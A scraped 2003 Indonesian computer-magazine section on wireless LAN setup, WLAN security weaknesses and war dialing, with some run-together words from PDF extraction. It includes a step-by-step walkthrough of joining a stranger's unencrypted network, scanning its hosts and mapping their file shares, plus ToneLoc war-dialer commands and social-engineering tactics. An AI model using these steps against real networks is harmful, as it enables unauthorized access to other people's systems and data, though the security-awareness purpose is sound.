 Terlihat komputer lain yang meng-gunakan WNIC dengan tipe Peer-to-Peer juga pada channel 10. Disini adalah Windows XP dengan

 WNIC SMC2632W. Pada XP, wire-

less connection di-setup langsunglewat XP tanpa client manager. XPsangat wireless friendly.

5

Page 10: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 10/50

NeoStart

Mei/Jun 2003 NeoTek 9

Bahasan mengenai instalasi router yangdimaksud (SMC barricade) terdapatpada NeoTek II/2 November 2001.

Jadi disini selain komputer-komputeryang terhubung dengan kabel ke rou-ter, dapat terhubung juga komputer-komputer lewat AP secara wirelessmembentuk peer-to-peer networkingserta Internet access sharing.AP dapat disetarakan dengan hubpada LAN biasa. Ke AP ini andadapat menghubungkan komputeryang telah dipasangkan WNICmaupun AP lain lagi.

Murah dan mudahnya instalasi APmenjadi kepusingan tersendiri terha-

dap wireless security. Seorang karya-wan dapat memasang AP-nya sendirisebagai perluasan network perusaha-annya secara diam-diam. AP liar inidikenal sebagai rogue AP.

Tidak seperti memilih WNIC yanglebih harus hati-hati, justru AP lebihtidak rewel. AP merk apa saja dapatberfungsi dengan baik sebagai pintumasuk ke network (maka namanyaaccess point).

Pemilihan AP akan lebih didasarkanpada security feature yang disedia-kannya, tapi pada dasarnya hampirsemua AP yang beredar sekarangsudah menyediakan security featureyang memadai.

Security feature yang perlu diperhatikan:• WEP encryption• Membatasi koneksi berdasar MAC

address• Kemampuan men-disable beacon

broadcast (broadcast SSID dan timestamp secara periodik

Berikut adalah daftar harga perangkatyang digunakan dalam pengujian dalammembuat artikel ini.

Daf tar Harga

SMC2632W NIC SGD95Avaya Gold NIC SGD168SMC2655W v.2 AP SGD199SMC Barricade Router SGD105

INSTALASI AP UTILITY AP harus terhubung ke komputerinstalasi lewat kabel ethernet, baik langsung atau (dalam hal ini) lewatrouter. Setelah AP dikenali dan dri-

 ver terpasang, kini instal AP Utility dari CD yang sama. Setelah instal-asi akan terlihat pada Start Menu:EZ Connect Wireless AP Utility

BROWSE ACCESS POINTBegitu AP Utility dijalankan akantampil window yang browse APpada network anda. Akan didapatAP’s name berupa MAC Addressdan AP name (default MiniAP ).Ketikkan login password (default)dan klik LOGIN.

1 2

Instalasi SMC2655 v.2 Access Point pada SMC Barricade Router 

SECURITY Klik SECURITY dan terlihat bah-

 wa security status DISABLED jugaMAC access control table masihkosong. Klik SETUP dan akantampil window untuk men-setup

MAC address komputer yangboleh mengakses AP ini sertasetup WEP encryption.

4SECURITY SETTINGKenali MAC address dari setiapkomputer anda dan input keMAC access table. Dengan caraini komputer asing tidak mungkinmengakses AP anda. Untuk 

mengamankan data dari sniffer,aktifkan WEP encryption. Adadua pilihan: 64 bit atau 128 bit.

5

SSID, CHANNEL, IP ADDRESSInfo menunjukkan SSID (defaultWLAN ), channel (default 1 ), AP’sname (default MiniAP ), dan IPaddress (default 192.168.2.50 ) dandefault gateway (default192.168.2.1 ). Dua yang terakhirdiubah agar sesuai dengan settingIP pada SMC Barricade Router .

3

FIRMWARE DAN WEB SETUP Tombol ABOUT menginformasikanfirmware version yang digunakan.Firmware akan di-update secaraberkala dari situs SMC. Selanjutnya,setup AP dapat dilakukan dari

komputer mana saja dalam network dengan web browser dengan me-ngetikkan IP address AP ini.

6

Page 11: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 11/50

NeoStart

10 NeoTek Mei/Jun 2003

6 PENGAMATAN SINYALAnda bisa mengamati bahwa net-

 work ini beroperasi pada channel10 serta kekuatan sinyal dan noise,serta SNR (signal to noise ratio-nya).

IRELESS LAN BUKAN HANYA RAWAN

terhadap orang yang ikut memanfa-atkan bandwidth (‘nyantol’), melain-

kan juga bahaya terhadap integritas kompu-ter yang ada didalam jaringan itu sendiri.

Sekali komputer asing masuk ke WLAN,maka komputer asing itu sudah menjadibagian dari internal network. Walaupun

komputer-komputer dalam network meng-gunakan router untuk membentuk NATfirewall ke Internet, komputer asing justrusudah masuk dibalik NAT sebagai salahsatu anggota keluarga (liar) dalam jaringantersebut.

Hal ini diperparah lagi bila jaringan itumengaktifkan network neighborhooduntuk sharing files!

WWIIRREELELESSS HAS HACCKKIINNGG

MMUUDDAHAHNNYYA ‘NA ‘NYYANANTTOOLL’’

WWLLAN OAN ORRANANGGUntuk ‘nyantol’ WLAN orang, cukup menggunakan komputeryang sudah terpasang WNIC serta Network Stumbler ,program untuk war driving. Sekali sudah masuk ke network orang melalui access point-nya, maka hacking tool sepertiIP scanner dan SMB scanner semakin mudah digunakan.

W

INFO DARI NETWORK STUMBLER Pilih tab AP Names dan terlihatbahwa network yang dikenali ha-nyalah MiniAP milik sendiri. Agarkedua network lain dikenali, ketik-kan MAC address dan AP name-nya berdasarkan informasi MACdan SSID dari Network Stumbler.Klik tombol Add to Table.

SELECT NETWORK Kembali ke tab Selection danklik pada salah satu network 

 yang berlabel Other untuk melakukan pengamatanterhadap network ini.

4 5

 Menunjukkan betapa WLAN membuat hacking menjadi semakin mudah saja...

RELEASE DAN RENEW 

Konfigurasi ini tidak cocok dengankonfigurasi network yang baru kitaakses. Klik tombol Release untuk mengosongkan konfigurasi danselanjutnya Renew untuk mengisikonfigurasi baru. Kita mendapat IP

baru (192.168.0.6) dengan defaultgateway 192.168.0.1. Diduga net-

 work ini menggunakan Microsoft ICS.

12GRAPHICAL SIGNAL/NOISE

Dengan Network Stumbler kita juga dapat menampilkan grafik  yang menunjukkan perbanding-an sinyal dengan noise. Walau-pun network ini telah teramati,kita belumlah mengakses net-

 work ini. Cara mengaksesnyasangatlah mudah.

10 JALANKAN WINIPCFG

Pilih Start > Run, ketikkan winipcfg yang akan menampilkan konfigu-rasi IP address. Terlihat bahwakomputer kita masih mengguna-kan konfigurasi IP address untuk network internal sebelumnya

pada 192.168.123.160 dan defaultgateway 192.168.123.254

11

Page 12: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 12/50

NeoStart

Mei/Jun 2003 NeoTek 11

MENGAKSES NETWORK Untuk dapat mengakses network tadi pada Avaya Wireless ClientManager pilih Actions > Add/EditConfiguration Profile yang akanmenampilkan window Add/EditConfiguration Profile. Buatprofile baru (namakan Wireless)dengan tipe Access Point.

EDIT PROFILEKlik tombol Edit Profile yang akanmenampilkan window Edit Con-figuration (  nama profil  ). IsikanNetwork Name dengan Wirelesssaja, sesuai dengan yang teramatioleh Network Stumbler. Selanjut-nya gunakan profil ini dan kitaterhubung pada network ini.

7 8

‘NYANTOL’ BERHASIL

 Jalankan aplikasi Internet apasaja dan anda dapat mengaksesInternet lewat account orang lain.Periksa lewat web browser ber-apa kecepatan akses yang dapatdiperoleh. Diduga menggunakan

ADSL 512K.

13BAHAYA LANJUTAN

Komputer kita sudah menjadisalah satu anggota (liar) darinetwork mereka. JalankanSuperscan untuk men-scan net-

 work ini. Terlihat adanya port139 yang terbuka yang berarti

aktifnya network neighborhoodpada sistem Windows.

14

INFO LAIN NET STUMBLER Setelah terhubung ke network iniinformasi lebih jauh akan diper-oleh. Terlihat bahwa network iniberoperasi pada channel 1, 4, dan10 (bukan hanya 10 seperti yangteramati sebelumnya), menggu-nakan AP merk Netgear dan ber-bagai informasi lainnya.

9

AKSES KE FILE/HARD DISK 

Dapat juga menjalankan Legionatau SMB scanner lain untuk meng-akses shares yang tersedia. Disinidengan Legion kita melakukanmapping terhadap salah satu sharemenjadi suatu drive di komputer

kita sehingga dapat mengamatiisinya lebih lanjut. Sampai disinikegiatan harap dihentikan!

15

3TAB SELECTION

Pindah ke tab Selection, klik ScanNow dan terlihat bahwa sebenar-nya WNIC kita mengenali dua laginetwork selain WLAN dan diberilabel Other . Masing-masing tipeInfrastructure (AP atau ResidentialGateway) dan teramati beroperasipada channel 6 dan 10.

AKTIFKAN NETWORK STUMBLER 

Komputer contoh mengakses WLANmilik NeoTek seperti terlihat padaAvaya Wireless Client Manager.

 Jalankan Network Stumber danterlihat selain SSID WLAN milik NeoTek (channel 3), terdapat dualagi access point. Semuanya tanpamengaktifkan enkripsi!

PERIKSA SITE MONITOR 

Pada Avaya Wireless ClientManager pilih Advanced > SiteMonitor , terlihat pada tab SiteMonitor bahwa AP yang dapatdiakses hanyalah MiniAP yangartinya AP milik NeoTek sendiri.

1 2

Page 13: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 13/50

NeoStart

12 NeoTek Mei/Jun 2003

IRELESS LAN MERUPAKAN TEKNOLOGI YANG

saat ini paling cepat perkembangan mau-pun penerapannya. Akibatnya terjadi

kesenjangan antara cepatnya penerapan dengankemajuan pengamanan (security).

Pada dasarnya WLAN tidak mempunyai perlin-

dungan fisik dibandingkan halnya wired LAN.Kita bandingkan wired LAN dengan wirelessLAN sebagai berikut.

Untuk dapat mengakses suatu LAN, anda harusmenghubungkan komputer anda yang telah di-pasangkan NIC ke wired network tersebut dengankabel, namun pada WLAN ‘kabel’ itu tidak adaatau dipancarkan kemana-mana dan setiap kom-puter dengan wireless NIC dapat terhubung kewireless LAN.

Siapa saja dapat terhubung ke suatu wireless LAN melaluiaccess point-nya, menjadi anggota (liar) dari network terse-but, yang dengan demikian tidak ada gunanya network ter-sebut dilindungi dengan NAT firewall, sebab siapa saja bisalangsung masuk ke balik NAT firewall.Selain kelemahan tidak adanya perlindungan fisik yang in-heren pada koneksi wireless, kelemahan lain adalah banyak-nya wireless LAN yang dipasang dengan default configura-tion, serta kelemahan inheren protokol 802.11b itu sendiri,yang menjadi protokol untuk wireless LAN.

Kurangnya Perhatian Terhadap Perlindungan WLAN

Hasil war driving yang dilakukan oleh PISA di Hong Kongpada bulan Juli 2002 menunjukkan bahwa sebagian besar(77%) access point yang ditemukan (187 access point) ti-dak mengaktifkan WEP encryption. Hasil war driving se-cara global juga menunjukkan kecenderungan yang sama.

72% dari sekitar 25.000 access point yang ditemukan tidakmengaktifkan enkripsi. Semua inirawan terhadap sniffer sepertimisalnya Ethereal

Lebih jauh lagi, 51% dari 187 APyang itu menggunakan default SSID.Diketahuinya MAC address danSSID membuat setiap orang dapatterhubung (associate) ke suatuaccess point.

Apabila war driving hanya untuk ke-pentingan statistik dan tidak men-cari informasi lebih jauh terhadap

AP tertentu, maka pada war chalk-ing, dicari karakteristik lebih jauh

terhadap AP tertentu. Pada war chalking,AP yang termonitorditandai (dari sini muncul istilah chalking) apakah merupakanopen node, closed node, ataupun wep node.

War chalking dengan demikian dapat digunakan untuk ma-suk ke network (dengan tujuan baik maupun buruk) selainuntuk ‘nyantol’ koneksi Internet

Komunitas war chalking dapat dihubungi lewat situs web-nya: http://www.warchalking.org/

Tidak Adanya Perlindungan Fisik 

Sinyal wireless LAN normalnya dapat ditangkap padakisaran sekitar 200 meter dari access point, tetapi clientyang menggunakan antena eksternal dapat menangkapsinyal sampai sejauh 1000 meter.

Apabila anda menempatkan AP dekat pintu atau jendela,dapat dipastikan para tetangga dapat ikut menikmati akses

Internet atau melakukan sniffing terhadap traffic network.

Memahami WLMemahami WLAN Security AN Security Artikel ini diangkat dari bahan-bahan yang didapat dari S.C. Leung CISSP CISA CBCP

([email protected]) yang juga ketua dari PISA (Professional Information Security Association)suatu organisasi non-profit berbasis di Hong Kong yang memanfaatkan keahlian dan pengetahuan

untuk membawa kemakmuran kepada masyarakat di abad informasi. NeoTek bertemu denganS.C. Leung sewaktu Security Conference Summit di Singapore.

W

WWIIRREELELESSS HAS HACCKKIINNGG

• War driving dilakukan oleh PISA pada bulan Juli 2002 dengan mengendarai trem

dari Ke nned  y Town ke Causewa y Ba y  selama 2 jam, menggunakan perlengkapan standar dan software gratis. Hanya melakukan discovery.

Tidak melakukan koneksi ke AP (association).

Page 14: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 14/50

Apabila infrastruktur wireless LAN itu melibatkan koneksiwireless antar-gedung tinggi, maka client yang tidak diingin-kan dapat melakukan sniffing dari bawah sejauh sampai2.500 kaki (762 meter). Jadi walaupun sinyal wireless LANpara ISP yang dipasangkan di puncak-puncak gedung tinggidapat di-sniffing dari bawah (dikenal sebagai war flying).

Tidak adanya perlindungan fisik ini pula yang membawamasalah bukan saja akses ilegal terhadap suatu access point,melainkan juga munculnya access point-access point liardengan berbagai tujuan. Risiko-risiko security di antaranya:

• Pada network kantor misalnya, bisa saja seorang karyawantanpa izin memasang access point-nya sendiri (rogue AP)demi keleluasaan pekerjaannya. Hal ini bisa menjadi ba-haya bagi network perusahaan itu secara keseluruhan.

• Seseorang bisa mengaktifkan access point-nys sendiri ditempat umum dan tampil seolah-olah sebagai access pointresmi dan menangkap network traffic pada akses WLANuntuk umum (evil twin).

• Untuk melakukan sniffing, suatu komputer tidak harus

terhubung (associated) dengan access point. Dengan de-mikian untuk pemakai perorangan nyaris tidak mung-kin mengetahui apakah network traffic-nya sedang di-sniffing.

• Bukan itu saja, suatu laptop yang tidak terhubung kewireless network (tetapi WNIC-nya tetap terpasang),dapat terkena serangan client-to-client. Ini dikarenakansifat WNIC yang dapat mengaktifkan ac-hoc peer-to-peernetwork tanpa adanya access point. Koneksi ini dikenalsebagai IBSS (Independent Basic Service Set). Jadi walau-pun suatu perusahaan tidak memasang wireless LAN,tetapi network-nya dapat diserang lewat salah satu kom-puter yang terhubung padanya dan kebetulan pada kom-puter itu tanpa disadari masih terpasang WNIC.

• Tidak adanya perlindungan fisik pula yang membuatwireless network mudah terganggu oleh peralatanrumah tangga biasa seperti microwave oven, cordlessphone, serta peralatan-peralatan yang menggunakanteknologi Bluetooth. Ini dikarenakan banyak peralatanyang menggunakan frekuensi 2,4GHz seperti halnyawireless network (peralatan dengan protokol 802.11b).

Untuk mengatasi kelemahan tidak adanya perlindungan fisikini, beberapa tindakan dapat dilakukan untuk meminimum-kan risiko, di antaranya:• Jangan menempatkan AP dekat pintu atau jendela• Kurangi daya broadcast access point• Matikan AP bila tidak sedang dipakai• Untuk perusahaan: Jangan biarkan adanya rogue AP dan

kalau menggunakan building antenna, gunakan directionalradiation dan setel sudut pancarannya.

Default Configuration

Banyak wireless LAN yang terpasang dengan default con-figuration yang lemah dan rawan terhadap penyusup:

• WEP encryption tidak diaktifkanMemang WEP encryption berlaku umum untuk semuaclient dan dapat di-crack, tetapi paling tidak anda akanterlindung dari casual hacker.

• SSID default dan di-broadcastAP mempunyai default SSID, seperti Linksys (Linksys),Tsunami (Cisco),WLAN (SMC), dan semua di-broadcast

• Akses admin mudah dilakukanAdmin name dan password default harus dihindari karenaAP dapat diakses lewat web, telnet, ataupun SNMP tanpadifilter sama sekali. Bila AP ini mempunyai feature SNMP,maka jangan gunakan default community string ataumatikan sama sekali fungsi SNMP.

• Tidak ada access control terhadap clientWalaupun memang AP mempunyai fasilitas untuk mem-filter komputer dengan MAC address mana saja yangboleh mengakses suatu AP, dalam kenyataannya ini ha-

nya dapat dilakukan dalam sisitem skala kecil.

Kelemahan Inheren Protokol 802.11b

Wireless LAN masih berkembang dan sampai sekarangmasih terdapat celah yang besar antara kebutuhan securitydengan apa yang terdapat pada protokol 802.11b.

Protokol 802.11b mempunyai banyak kelemahan:

• Otentikasi yang LemahPada protokol 802.11b tidak terdapat user authenticationdan SSID di-broadcast dan dengan mudah dapat dike-tahui dengan menjalankan Network Stumbler. MACaddress selain dapat dimonitor juga dapat dipalsukan

(spoofed), tidak adanya mutual authentication yangmemungkinkan munculnya AP palsu.

• WEP bersifat statik (sama untuk semua user)WEP dirancang hanya untuk melindungi network trafficdari pengintip (eavesdropping) yang dapat dengan mudahmelihat network traffic dengan sniffer seperti Ethereal.Tetapi walaupun telah diproteksi dengan WEP, apabilasniffer berhasil mengumpulkan data sampai sekitar 4 jutaframe (pada network yang sibuk hanya memerlukanwaktu 5 jam untuk mendapatkan 4 juta frame), makasoftware seperti WEPCrack atau AirSnort dapat meng-crack enkripsi 128 bit ini.

• Message Integrity yang Lemah

Paket data 802.11b hanya ditujukan untuk menanganierror detection dengan menggunakan CRC32 linear

NeoStart

Mei/Jun 2003 NeoTek 13

• Network Stumbler secara otomatis menunjukkan network yang

termonitor lengkap dengan MAC address, SSID, dan enkripsinya.

Page 15: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 15/50

checksum yang rawan terhadap bit-flipping attack (ber-akibat pada pengubahan pesan yang terkirim). Juga tidakterdapat pengecekan terhadap message sequence maupuntimestamp, yang membuat wireless LAN rawan terhadapreplay attack. (berakibat pada indentity spoofing).

Peningkatan Security pada Protokol 802.11

Dengan begitu banyaknya kelemahan pada wireless LANyang menggunakan protokol 802.11b, kini peningkatansecurity sedang dilakukan dengan pengembangan protokol802.11i yang diharapkan selesai pada akhir 2003 (baru spe-sifikasinya, belum peralatannya).

Selain itu, sebagai subset dari 802.11b, WPA (Wi-Fi Pro-tected Access) diusulkan oleh Wi-Fi Alliance yang akan menyediakan authentication framework TKIP yang akanmemperkuat integritas WEP dengan adanya Message In-tegrity Code (MIC) untuk mencegah pemaluan paket data,IV sequencing yang baru untuk mencegah replay attack,serta WEP re-keying yang berubah setiap 10.000 paket.

Masalah Security yang Masih Harus Diselesaikan

Semua perbaikan yang mengubah total hampir keseluruh-an konsep security pada protokol 802.11 ternyata belummengatasi keseluruhan masalah security pada wireless LAN.

Salah satu masalah ini terletak pada layer 2 managementframe. Menurut spesifikasi 802.11

• Management frame tidak diotentikasiManagement frame terdiri dari association (terhubung keAP), disassociation (terputus dari AP), serta beacon (broad-casting MAC address, SSD, dan time stamp secara periodikoleh AP). Konsekuensinya tidak ada cara untuk membeda-kan AP yang sesungguhnya dari AP palsu, serta penyerangdapat melakukan deasosiasi terhadap klien sehinggaterputus hubungannya dari AP.

• Management frame dikirim sebagai clear text.Hal ini mengakibatkan mudahnya melakukan sniffing.

Kelemahan-kelemahan ini dimanfaatkan untuk mengem-bangkan hacking tools terhadap wireless LAN, seperti AirJackyang dikembangkan Abaddon ([email protected])dan diperkenalkan dalam BlackHat Briefings 2002.

AirJack adalah tool untuk melakukan disassociation DoSattack terhadap WNIC card tipe Prism dan Hermes selainfungsi-fungsi lain yang tidak kalah seramnya:

• WLAN-Jack: DoS terhadap WLANDapat dijalankan secara broadcasted atau directed. Padadirected mode,korban akan mengira kerusakan ada padaWNIC-nya.

• ESSID-Jack: Mendapatkan SSID yang DisembunyikanMengirimkan de-authentication frame ke broadcast addressdan listen ke client probe request serta AP probe response.

• Monkey-Jack: Man-in-the-Middle AttackMen-deauthenticate korban dari AP sebenarnya denganmengirimkan deauthenticate frame menggunakan MACaddress dari AP. Korban akan men-scan AP kembali.Korban terasosiasi ke AP palsu (channel baru) pada mesinpenyerang. Akibatnya penyerang berhasil menyusup diantara client dengan server.

• Kracker-Jack: Menyerang VPN yang Lemah

Berbagai tool untuk wireless hacking yang tersedia untuk sis-

tem operasi Windows bersifat sangat hardware specific, se-hingga anda harus memperhatikan WNIC apa yang sesuai

untuk dipakai untuk tool tertentu. AiroPeek NX, suatu wire-less auditing tool misalnya, dapat berfungsi dengan WNICORiNOCO, tetapi tidak dengan WNIC Avaya yang dikatakanidentik (merupakan pecahan) dari Lucent.

Banyak juga tool lain yang hanya tersedia pada Linux dan in-stalasinya tidak mudah bagi para pemula dalam Linux. Sebutsaja misalnya Kismet (padanan Network Stumbler), WEPCrackdan AirSnort (keduanya WEP cracker).AirSnort memang

dapat di-port ke Windows dengan meng-compile sendiri versiWindows (pada Linux) dengan menyertakan GTK+ dan GIMPfor Windows serta menggunakan beberapa library yang di-peroleh dari hasil instalasi AiroPeek NX demo.

Penutup

Dengan demikian banyak kelemahan yang belum diatasiapakah anda tetap mempertimbangkan wireless LAN?

Untuk pemakaian pribadi, security yang ada sekarang, ter-utama WEP encryption sudah memadai untuk mengatasiserangan casual hacker. Adapun untuk perusahaan perludipertimbangkan penempatan access point pada DMZ(demiliterized zone), sedangkan internal network (wired)

harus berada di tempat yang aman.Juga perlu dipertimbangkan metode keamanan dari pihakketiga baik yang generik seperti firewall,VPN, RemoteAuthentication Dial-In User Service (RADIUS), maupunyang merupakan pengayaan terhadap WEP encryptionseperti TKIP (Temporal Key Integrity Protocol) dan AES(Advanced Encryption Standard), dan SSL (Secure Socketlayer) serta implementasi IDS (Intrusion DetectionSystem).

Windows XP, misalnya selain wireless friendly, juga sudahlebih secure dari versi-versi Windows sebelumnya dengansudah terintegrasinya AES.

NeoStart

14 NeoTek Mei/Jun 2003

• Windows XP sudah menyediakan fitur IEEE892.1x Authentication

 pada LAN Properties-nya

Page 16: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 16/50

NeoStart

Mei/Jun 2003 NeoTek 15

ARDIALING ADALAH KEGIATAN SCANNING TERHADAP

nomor-nomor telepon tertentu dengan menggu-nakan komputer dan modem. Setiap nomer telepon

yang terhubung ke modem akan menjawab dengan mo-dem handshake sehinga dapat terjalin koneksi.

Wardial sangat popular pada awal keberadaan Internet, ka-rena pada masa itu koneksi internet lebih banyak terjalinmelalui kabel telpon dan modem. Inilah kenapa pada masalalu hacking merupakan kegiatan yang membutuhkan wak-tu dan kesabara. Meskipun koneksi internet pada saat initelah tumbuh dengan berbagai macam cara, namun koneksimengunakan jaringan telepon (dial-up) masih banyakdigunakan.

Cara kerja wardial adalah dengan melakukan scaning ter-hadap nomor-nomor telepon seperti halnya program portscanner. Sebuah host computer men-scan beberapa nomortelepon dalam range yang di tentukan dengan mengguna-kan modem. Setiap nomor telepon yang menjawab denganmodem hanshake (carrier) akan menjalin hubungan de-ngan host dan akan terekam dalam sebuah log file.

Dari log inilah kita dapat mengetahui nomor-nomor tele-pon mana yang terhubung ke Internet. Beberapa wardial

tool yang dengan dukungan modem tertentu dapat jugamendeteksi mesin fax, PBX, dan suara manusia Sangatlahpenting untuk melakukan wardialing dengan hardwareyang sesuai untuk dapat menghindari kegagalan atauerror report.

Setelah penyusup melakukan wardialing dan mendapatkannomor carrier (nomer telpon yang terhubung ke modem

—dan tentu saja komputer) penyusup tinggal melakukanbruteforce terhadap login password yang diminta padakomputer sasaran, untuk mendapatkan akses ke jaringankomputer sasaran dan melakukan yang diinginkan.

Wardial juga dapat untuk memacetkan jaringan teleponkhususnya mesin fax, karena pada wardial kita dapatmemanggil nomer yang dituju berkali-kali (100–200 kalicukuplah) karena fax mesin akan melakukan redial 2–5kali untuk dapat terjalin hubungan dengan nomor pengi-rim. Namun sayang pulsa telepon kalau sekedar untukmemacetkan jaringan telepon/fax mesin sasaran .

Mendapatkan Nomor Telepon Target

Penyusup dapat dengan mudah mendapatkan nomor telepontarget. Cukup dengan menghubungi pusat informasi tel-kom, dari yellow pages, ataupun melakukan social engin-eering. Kemungkinan terburuk buruk mungkin mengorek-ngorek tong sampah (trashing) di perusahaan itu. Setelahmendapatkan nomor telepon target, penyusup tinggalmelakukan wardialing ke nomer tersebut

Beberapa software wardial terdapat pada CD NeoTek kaliini. Di antaranya:

• ToneLoc• THC-Scan• PhoneTag 13dan lainnya, tetapi yang dibahas khusus adalah dua wardialer yang pertama, yang merupakan war dialer klasikdan menjadi contoh bagi pengembangan war dialer lain.

 W  W ardial untuk Mencari Mangsaardial untuk Mencari MangsaWar driving mendapatkan namanya dari kegiatan tempo dulu yang dikenal sebagai Wardial.

Tambahan pengetahuan tetang mengetest security jaringan khususnya yang mengunakanline telepon (dial-up) ini disajikan oleh Putut Indrayana ([email protected])

W

SSCCANAN NNIINNG DG DIAL-UIAL-UP MP MOODDEEMM

Trashing

Trashing adalah mencari data atau berkas tertentu dari per-usahaan dengan cara mengumpulkan berkas yang tidak di-pakai atau yang telah dibuang untuk mendapatkan informasiyang dicari. Meski kedengarannya seperti mengumpulkan

sampah, tapi kita akan terkejut dengan sampah data yangkita kumpulkan, karena kemungkinan besar akan didapat databerharga bagi kita yang bagi mereka tidak berarti apa-apa.

Bruteforce

Bruteforce adalah cara lain dari dictionary attack atau me-mecahkan password dengan mencoba satu-persatu karakteratau kata dengan bantuan kamus kata-kata (wordlist ).Cobalah membuat kamus kata sendiri denganmemperkirakan apa yang ada di pikiran dan lingkunganpembuat password. Dengan demikian nilai untuk keberha-silannya lebih baik

Social Engineering (SE)

Social engineering dapat dijelaskan dengan berbagai cara,

namun definisi saya tentang social engineering adalah:"melakukan pendekatan secara langsung ataupun tidak

langsung kepada orang tertentu untuk mendapatkaninformasi yang kita inginkan." Dan dalam teknik ataupelaksanaannya seorang social engineer akan berbohong,menipu, mengintimidasi orang lain dengan berbagai carauntuk mendapatkan informasi yang diinginkan. Namunkebanyakan social engineering dilakukan melalui telepon.

Sebagai contoh:

Jika seorang hacker ingin menyusup ke jaringan komputersebuah perusahaan namun tidak bisa mendapatkan accountdengan cara hacking biasa, maka dia mencoba menelpeonperusahaan tersebut dan dengan sangat cerdik mengaku seba-gai seseorang yang bertugas memperbaiki jaringan komputerperusahaan tersebut dan mengujinya secara remote, namundia tidak diberi account ke jaringan,dan operator penerimatelpon pun memberikannya agar semua orang bisa melanjut-kan pekerjaannya masing-masing.

Kedengaranya sangat skeptik jika kita percaya kalau SEseperti ini akan berhasil, namun di banyak kasus telahterbukti berhasil, karena meskipun perusahaan tersebutmemiliki security yang ketat tapi kelemahan yang palingbesar terdapat pada pegawainya.

Page 17: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 17/50

NeoStart

16 NeoTek Mei/Jun 2003

3 MODEMSTRING MENUDisini anda dapat meng-customizeAT command pada modem anda.Anda dapat mengubah ATDTmenjadi misalnya ATDT 9,031 yangsecara otomatis menggunakanprefiks line keluar (9) untuk dial keSurabaya (031). Umumnya tidak ada yang perlu diubah di sini.

EMANG SUDAH ADA WAR DIALER YANG

dibuat untuk Windows, tetapi bia-sanya sudah sekaligus juga remote

access program (misalnya Telix for Windows).Adapun war dialer sendiri pada umumnyaditulis dengan DOS sebab memang pada jaman ramai-ramainya war dialing, Internetmasih dijalankan dengan command line.

ToneLoc dan kemudian disempurnakan olehTHC-Scan adalah war dialer dengan kemam-puan besar dan relatif mudah digunakan.

Memang, bila anda sejak awal sudah terbiasadengan Windows, agak sedikit kikuk meng-gunakan program DOS.Yang penting, biasa-kan dulu navigasi program dengan menggu-nakan panah kiri/kanan/atas/bawah danselect/unselect menu dengan Enter/Esc.

WWARARDDIALEIALERR

TTOONNE LE LOOC & TC & THHE HAE HACCKKEER’SR’S

CCHHOOIICCE TE THHC-C-SSCCANANWar dialer dikelompokkan sebagai phreaking program,yaitu program untuk meng-hack sistem telepon. Dalampengoperasiannya, war dialer dapat disetarakan dengan portscanner, hanya war dialer men-scan nomor-nomor telepon(exchange scanner ).

M

MEMBUAT FILE TL.CFGSebelum menjalankan ToneLoc,software perlu dikonfigurasi agarmengenali COM port, time delay,dan tempat menyimpan hasil war-dial. Pertama jalankan tlcfg.exe

 yang menampilkan menu bar(pilih dengan panah kiri/kanan )dan Enter untuk dropdown menu.

FILES MENUDari Files menu tetapkan nama-nama file untuk Log, Carrier, Found.Pada file-file ini disimpan hasil dial,termasuk response (busy, timeout,atau login prompt). Sebaiknyanama file diatur sesuai prefikstelepon. Blacklist berisi nomor

 yang jangan di-dial seperti 108.

1 2

ToneLoc adalah war dialer klasik yang menjadi favorit para hacker di jamannya

Untuk waktu dial 1 menit dan Wait Delay setting 45 detik, maka diperlukan waktu 16

 jam untuk men-dial 1000 nomor. Adabaiknya mencoba mengurangi Wait Delay sampai sekitar 35.000 (35 detik).

Untuk meng-capture data dari carrier yang

teramati, pastikan Save .DAT Files disetel Y.Setelah ToneLoc selesai dikonfigurasi, savefile tlcfg.exe ini ke disk. Ada baiknya renamefile ini menjadi lebih deskriptif seperti misal-nya 555-com1.cfg untuk memudahkan me-ngenalinya di kemudian hari.

Untuk menjalankan ToneLoc, masuk pilihStart > Run dan ketikkan command untuk membuka command prompt. Ketikkan

C:\>toneloc.exe <enter> untuk melihatopsi-opsinya.

Perintah berikut akan men-save hasil ke file031555-.dat (sesuai exchange prefix) denganmenggunakan opsi konfigurasi yang telahditetapkan sebelumnya di file 555-com1.cfg

C:\>toneloc.exe 031555-.dat /C:555-com1.cfg

MODEMOPTIONS MENU

Dari ModemOptions tetapkan set-ting fisik modem, misalnya konek ke port COM mana. GunakanControl Panel > Phones andModem Setting untuk mengeta-

huinya. Biasanya cuma ini yangperlu di-set. ToneLoc hanya dapatmenggunakan satu buah COM port.

4SCANOPTIONS MENU

Anda mungkin harus mengaturBetween-call Delay dan WaitDelay Setting. Keduanya milidetik.Kalau modem seperti hang, ting-katkan Between-call Delay. Wait

Delay sangat penting, yaitu waktubagi ToneLoc dalam menunggu jawaban.

5

Page 18: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 18/50

NeoStart

Mei/Jun 2003 NeoTek 17

Asalkan dasar-dasar navigasi itu sudahdibiasakan, maka kediua program iniakan terasa mudah digunakan,khusus-nya untuk mengkonfigurasi program ini.

Setelah selesai konfigurasi, untuk men- jalankannya aktifkan jendela commandline (menjalankan command.com ataucmd.exe), masuk ke direktori programwar dialer,dan dari situ ketikkan perintah-perintahnya.

Mengetikkan nama program dan tekan<enter> akan menampilkan opsi-opsi-nya. Pelajari opsi-opsi itu (kalau perlulihat manualnya). Misalnya:

C:\>toneloc.exe <enter>, atau

C:\>thc-scan.exe <enter>

